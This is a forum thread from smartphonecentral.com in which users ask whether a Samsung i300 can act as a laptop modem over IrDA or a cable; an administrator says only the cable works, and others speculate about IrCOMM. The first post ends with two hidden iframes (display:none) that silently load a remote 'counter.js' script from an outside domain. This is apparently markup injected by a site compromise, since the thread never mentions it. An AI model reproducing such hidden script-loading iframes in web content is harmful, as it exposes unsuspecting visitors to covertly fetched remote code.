+ Reply to Thread
    smartphonecentral.com

Modem scripts/IRDA

Has anyone successfully used their i300 with a laptop as a modem, either with a cable or through iRDA? I've tried the Sprint PCS Phone script (not intended expressly for this phone) with little success. My laptop (G4 TiBook) will recognize the iRDA device but can't seem to dial to it.

I thought if somebody had a working modem script it could be adapted to use in my environment. Or, if anybody has any feedback from their own experiences, it'd be appreciated.

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

do a search next time...

this phone will not work as a modem thru the IrDA port... period. this has been asked millions of times.. the irda port is "hardwired" to the plam side of the phone... the "phone" side never "sees" this as an option to be used as a modem... :p

now it can definatelty be uysed thru the cable with great success (even the charger cradle). just set it up as you would a normal modem...

smartphonecentral.com
    Thanks for the gracious response.

Merry Christmas.

Originally posted by Marctronixx
    do a search next time...

this phone will not work as a modem thru the IrDA port... period. this has been asked millions of times.. the irda port is "hardwired" to the plam side of the phone... the "phone" side never "sees" this as an option to be used as a modem... :p

now it can definatelty be uysed thru the cable with great success (even the charger cradle). just set it up as you would a normal modem...
    Hmm.. are you sure? The palm side can see both the modem and the IrDA port. It should be fairly simple for someone to write something that sends data back and forth between the irda port and the modem, even if those two ports aren't directly related.
    -mark

Administrator

Arrow

prety sure... but yes, anyting is possibile.. but right out of the box it cant be done....

this was wondered in the 6035 days... we were all trying to find ways to use the irda port for a modem, but no luck...

smartphonecentral.com

Follow-up - IrDA vs. IRCOMM

As I understand it, IrCOMM is the protocol used when devices function as modems via an infrared connection. So, it may be helpful or interesting (or simply an error) to know that my PowerBook G4 recognized the i300 as both an iRDA device *and* and IrCOMM device.

That may give clues as to the possibility of at least hooks being in place to develop a modem script or utility that functions as one.

Having said that, it's important to reiterate that I (and nobody else, as far as I know) have been able to get the i300 to work as a modem. Period. Some say it's flat out impossible, which may end up being true. Won't stop me from trying, though.

Happy New Year everybody!